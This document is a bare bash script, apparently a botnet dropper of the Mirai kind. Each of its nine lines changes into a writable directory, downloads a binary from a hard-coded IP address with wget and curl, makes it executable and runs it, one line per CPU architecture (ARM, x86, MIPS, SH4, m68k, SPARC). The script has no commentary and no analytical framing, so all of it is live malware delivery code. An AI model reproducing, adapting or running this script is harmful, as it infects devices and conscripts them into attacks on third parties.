#!/bin/bash
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.110/netlab360.arm; curl -O http://193.228.91.110/netlab360.arm;cat netlab360.arm >gigs;chmod +x *;./gigs
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.110/netlab360.arm5; curl -O http://193.228.91.110/netlab360.arm5;cat netlab360.arm5 >gigs;chmod +x *;./gigs
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.110/netlab360.arm7; curl -O http://193.228.91.110/netlab360.arm7;cat netlab360.arm7 >gigs;chmod +x *;./gigs
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.110/netlab360.x86; curl -O http://193.228.91.110/netlab360.x86;cat netlab360.x86 >gigs;chmod +x *;./gigs
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.110/netlab360.mips; curl -O http://193.228.91.110/netlab360.mips;cat netlab360.mips >gigs;chmod +x *;./gigs
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.110/netlab360.mipsel; curl -O http://193.228.91.110/netlab360.mipsel;cat netlab360.mipsel >gigs;chmod +x *;./gigs
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.110/netlab360.sh4; curl -O http://193.228.91.110/netlab360.sh4;cat netlab360.sh4 >gigs;chmod +x *;./gigs
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.110/netlab360.m68k; curl -O http://193.228.91.110/netlab360.m68k;cat netlab360.m68k >gigs;chmod +x *;./gigs
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://193.228.91.110/netlab360.spc; curl -O http://193.228.91.110/netlab360.spc;cat netlab360.spc >gigs;chmod +x *;./gigs
